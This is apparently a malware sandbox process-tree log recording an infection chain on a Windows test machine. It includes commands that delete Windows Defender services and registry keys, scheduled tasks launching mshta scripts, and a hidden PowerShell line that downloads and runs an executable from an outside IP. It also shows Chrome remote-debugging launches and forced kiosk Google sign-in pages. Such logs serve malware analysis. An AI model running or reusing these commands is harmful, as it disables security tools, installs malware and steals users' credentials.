        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        13⤵
        Launches sc.exe
        
        PID:1340
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        13⤵
        Launches sc.exe
        
        PID:8116
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        13⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6136
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        13⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8412
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        13⤵
        
        PID:8440
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        13⤵
        Launches sc.exe
        
        PID:8392
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        13⤵
        
        PID:6632
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        13⤵
        Launches sc.exe
        
        PID:3512
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        13⤵
        Launches sc.exe
        
        PID:2636
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        13⤵
        
        PID:5200
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        13⤵
        Launches sc.exe
        
        PID:8544
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        13⤵
        
        PID:8224
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        13⤵
        
        PID:8328
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        13⤵
        Launches sc.exe
        
        PID:8620
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        13⤵
        Launches sc.exe
        
        PID:8604
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        13⤵
        
        PID:6532
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        13⤵
        Launches sc.exe
        
        PID:6660
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        13⤵
        Launches sc.exe
        
        PID:6684
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        13⤵
        
        PID:6708
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        13⤵
        Launches sc.exe
        
        PID:6732
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        13⤵
        
        PID:6756
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        13⤵
        
        PID:6772
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        13⤵
        Launches sc.exe
        
        PID:6824
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        13⤵
        Launches sc.exe
        
        PID:6912
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        13⤵
        
        PID:6956
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        13⤵
        Launches sc.exe
        
        PID:6992
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        13⤵
        Launches sc.exe
        
        PID:7004
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        13⤵
        
        PID:1604
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        13⤵
        Launches sc.exe
        
        PID:7036
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        13⤵
        
        PID:7064
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        13⤵
        
        PID:7104
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        13⤵
        Launches sc.exe
        
        PID:5244
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        13⤵
        Launches sc.exe
        
        PID:6844
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        13⤵
        
        PID:5480
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        13⤵
        Launches sc.exe
        
        PID:8352
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        13⤵
        Launches sc.exe
        
        PID:5304
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        13⤵
        
        PID:4492
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        13⤵
        
        PID:2716
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        13⤵
        Launches sc.exe
        
        PID:808
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        13⤵
        
        PID:4956
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        13⤵
        Launches sc.exe
        
        PID:3836
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        13⤵
        
        PID:7152
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        13⤵
        
        PID:5784
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        13⤵
        
        PID:5536
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        13⤵
        Launches sc.exe
        
        PID:1016
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        13⤵
        
        PID:7088
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        13⤵
        Launches sc.exe
        
        PID:3372
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        13⤵
        Launches sc.exe
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        13⤵
        
        PID:5496
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        13⤵
        Launches sc.exe
        
        PID:8484
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        13⤵
        Launches sc.exe
        
        PID:8152
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        13⤵
        
        PID:9044
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        13⤵
        
        PID:5432
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        13⤵
        
        PID:7276
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        13⤵
        
        PID:4332
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        13⤵
        
        PID:5932
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        13⤵
        Launches sc.exe
        
        PID:6248
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        13⤵
        Launches sc.exe
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
        8⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\10337530101\6f415ff773.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337530101\6f415ff773.exe"
        8⤵
        
        PID:4252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn SVcESmaeTDi /tr "mshta C:\Users\Admin\AppData\Local\Temp\zoMI5ZAs9.hta" /sc minute /mo 25 /ru "Admin" /f
        9⤵
        
        PID:4808
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn SVcESmaeTDi /tr "mshta C:\Users\Admin\AppData\Local\Temp\zoMI5ZAs9.hta" /sc minute /mo 25 /ru "Admin" /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7500
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\zoMI5ZAs9.hta
        9⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VGPE7UKI2VTYDKZY8VIO7XOOOKTYXGSD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7804
        
        C:\Users\Admin\AppData\Local\TempVGPE7UKI2VTYDKZY8VIO7XOOOKTYXGSD.EXE
        
        "C:\Users\Admin\AppData\Local\TempVGPE7UKI2VTYDKZY8VIO7XOOOKTYXGSD.EXE"
        11⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10337540121\am_no.cmd" "
        8⤵
        
        PID:8884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        9⤵
        
        PID:408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        9⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7216
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        9⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7484
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "ohEbrmagh7n" /tr "mshta \"C:\Temp\0lMGcDmSs.hta\"" /sc minute /mo 25 /ru "Admin" /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7796
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\0lMGcDmSs.hta"
        9⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8284
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        11⤵
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\10337600101\f73ae_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337600101\f73ae_003.exe"
        8⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Local\Temp\10337610101\78bf86c114.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337610101\78bf86c114.exe"
        8⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337610101\78bf86c114.exe"
        9⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe"
        8⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe"
        9⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\10337630101\6cea8eed50.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337630101\6cea8eed50.exe"
        8⤵
        
        PID:6752
        
        C:\Users\Admin\AppData\Local\Temp\10337640101\4b4e90b6c4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337640101\4b4e90b6c4.exe"
        8⤵
        
        PID:6544
        
        C:\Users\Admin\AppData\Local\Temp\10337650101\bfdcd91edc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337650101\bfdcd91edc.exe"
        8⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\10337660101\01fb647d7e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337660101\01fb647d7e.exe"
        8⤵
        
        PID:1924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        9⤵
        Uses browser remote debugging
        
        PID:8084
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feef3a9758,0x7feef3a9768,0x7feef3a9778
        10⤵
        
        PID:6176
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        10⤵
        
        PID:4440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1060 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:2
        10⤵
        
        PID:6772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:8
        10⤵
        
        PID:6912
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:8
        10⤵
        
        PID:5480
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2444 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:8220
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1628 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:6540
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2744 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3016 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:2
        10⤵
        
        PID:3884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        9⤵
        Uses browser remote debugging
        
        PID:7400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feee019758,0x7feee019768,0x7feee019778
        10⤵
        
        PID:7556
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        10⤵
        
        PID:6116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1128 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:2
        10⤵
        
        PID:3708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:8
        10⤵
        
        PID:8996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1668 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:8
        10⤵
        
        PID:7044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:2152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2768 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:6940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2776 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:6868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1200 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:2
        10⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\10337670101\554ed4cbed.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337670101\554ed4cbed.exe"
        8⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        9⤵
        Kills process with taskkill
        
        PID:8356
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        9⤵
        Kills process with taskkill
        
        PID:8992
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        9⤵
        Kills process with taskkill
        
        PID:3752
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        9⤵
        Kills process with taskkill
        
        PID:5968
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        9⤵
        Kills process with taskkill
        
        PID:9112
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        9⤵
        
        PID:1564
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        10⤵
        
        PID:6768
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6768.0.1237007648\2000777132" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ea841a8-07b2-46f6-94e8-142a42e67c6a} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 1324 126d9858 gpu
        11⤵
        
        PID:5884
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6768.1.419246044\1726182755" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b90e8c79-163d-4f81-b5d9-d40700a00889} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 1512 1260d858 socket
        11⤵
        
        PID:6368
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6768.2.1198528903\1642564753" -childID 1 -isForBrowser -prefsHandle 1060 -prefMapHandle 1172 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6eea3ff1-9982-4c26-8917-b5d91291cccd} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 2112 1266e758 tab
        11⤵
        
        PID:7724
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        9⤵
        Kills process with taskkill
        
        PID:7212
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        9⤵
        Kills process with taskkill
        
        PID:8588
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        9⤵
        Kills process with taskkill
        
        PID:9064
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        9⤵
        Kills process with taskkill
        
        PID:5960
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        9⤵
        Kills process with taskkill
        
        PID:4400
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        9⤵
        
        PID:9048
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        10⤵
        
        PID:6520
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6520.0.498855494\620754393" -parentBuildID 20221007134813 -prefsHandle 1196 -prefMapHandle 1176 -prefsLen 20847 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b8e455f-b82e-4032-90f5-45e828cbe96b} 6520 "\\.\pipe\gecko-crash-server-pipe.6520" 1284 13af9e58 gpu
        11⤵
        
        PID:1968
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6520.1.2022428829\1114733639" -parentBuildID 20221007134813 -prefsHandle 1460 -prefMapHandle 1456 -prefsLen 21708 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6231d0d7-117c-4448-9b07-1d7f945dc229} 6520 "\\.\pipe\gecko-crash-server-pipe.6520" 1472 c4f3858 socket
        11⤵
        
        PID:2572
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6520.2.72368137\1359759400" -childID 1 -isForBrowser -prefsHandle 2272 -prefMapHandle 1836 -prefsLen 21746 -prefMapSize 233496 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {575117eb-e702-466b-b529-225217945785} 6520 "\\.\pipe\gecko-crash-server-pipe.6520" 1868 19c67258 tab
        11⤵
        
        PID:8708
        
        C:\Users\Admin\AppData\Local\Temp\10337680101\809c765aad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337680101\809c765aad.exe"
        8⤵
        
        PID:2584
- - C:\Users\Admin\AppData\Local\Temp\putty.exe
    "C:\Users\Admin\AppData\Local\Temp\putty.exe"
    3⤵
    PID:2816
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\2DB5.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
      4⤵
      PID:4504
- - C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
    "C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
    3⤵
    PID:328
- - C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
    "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
    3⤵
    PID:3356
- - C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
    "C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
    3⤵
    PID:3732
